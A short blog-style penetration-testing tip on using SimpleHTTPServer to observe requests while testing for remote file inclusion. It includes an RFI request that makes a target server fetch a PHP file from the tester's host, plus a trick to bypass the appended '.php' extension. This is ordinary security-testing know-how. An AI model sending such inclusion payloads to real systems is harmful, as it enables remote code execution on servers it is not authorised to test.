• Email info@cyberry.co.uk
  • using SimpleHTTPServer to view get requests when testing for RFI

  • If you want to see what get requests are being sent to your server, you can setup SimpleHTTPServer to view them from the command line.

    Simply navigate to the directory you want to host (in my case /var/www/html/) and once in this directory, launch the service on a port you are not using.

    for example:

    root@kali~# python -m SimpleHTTPServer 8001

    you can now use something like burp repeater to send things to your server to actually see what the get request looks like when it gets back to your server.

     

    So for example, from burp repeater you might send:

    192.168.179.159/content.php?route=http://192.168.179.149:8001/testrfi.php

    Yet when you view the output from SimpleHTTPServer you see you are getting a get request for “GET /testrfi.php.php HTTP/1.0” 404

    so what’s basically happening is that the server sending the request to your own SimpleHTTPServer is appending a .php to your request (hence the .php.php) and you are getting a 404 error message.

    This is very helpful as it means you can now simply rename your “testrfi.php” file to simply “testrfi” – and when you make the request from the remote server again, it will serve the page with a 200 code.

    once you’ve finished you can stop the service with ctrl+z and then completely kill the process (close port 8001) with:

    root@kali~# fuser -k 8001/tcp